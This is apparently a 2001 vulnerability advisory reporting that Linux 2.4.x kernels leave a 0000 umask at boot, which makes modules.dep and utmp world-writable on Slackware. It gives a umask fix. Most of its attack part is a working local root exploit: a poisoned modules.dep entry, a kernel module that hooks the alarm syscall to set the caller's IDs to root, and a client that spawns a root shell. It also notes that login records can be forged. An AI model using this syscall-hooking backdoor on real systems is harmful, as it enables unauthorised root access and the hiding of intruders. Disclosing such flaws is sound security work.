I posted this to the linux kernel mailing last Friday, July 13th 2001: Submitted by : Josh (josh@pulltheplug.com), lockdown (lockdown@lockeddown.net) on July 16th, 2001 Vulnerability : /lib/modules/2.4.5/modules.dep Tested On : Slackware 8.0. 2.4.5 Local : Yes Remote : No Temporary Fix : umask 022 at the top of all your startup scripts Target : root Big thanks to : slider, lamagra, zen-parse Greets to : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it, cryptix, s0ttle, xphantom, qtip, tirancy, Loki, falcon-networks.com. The 2.4.x kernels starting with 2.4.3 (i think) have, after load, left a umask of 0000. This forces any files created in the bootup scripts, without the command `umask 022` issued to be world writeable. In slackware, files include /var/run/utmp and /var/run/gpm.pid. This same vulnerability is responsible for creating /lib/modules/`uname -r`/modules.dep world writeable. With this file world writeable, all an intruder need do is put something like the following in /lib/modules/`uname -r`/modules.dep assuming the system's startup scripts modprobe lp: /lib/modules/2.4.5/kernel/drivers/char/lp.o: /tmp/alarm.o /tmp/alarm.o: where the alarm.o module is: #include #include #include #include #include #include #include #include #include #include #include #include #include extern void* sys_call_table[]; unsigned int (*old_alarm) (unsigned int seconds); unsigned int hacked_alarm (unsigned int seconds); unsigned int hacked_alarm(unsigned int seconds) { if(seconds == 454) { current->uid = 0; current->euid = 0; current->gid = 0; current->egid = 0; return 0; } return old_alarm(seconds); } int init_module(void) { old_alarm=sys_call_table[SYS_alarm]; sys_call_table[SYS_alarm] = hacked_alarm; return 0; } void cleanup_module(void) { sys_call_table[SYS_alarm] = old_alarm; } make a client: #include #include int main(void) { alarm(454); execl("/bin/sh", "sh", NULL); } which will, when the module is loaded, execute a shell as root. And of course with /var/run/utmp writeable, users can delete or in other ways manipulate their logins as they appear in w/who/finger/getlogin(), etc.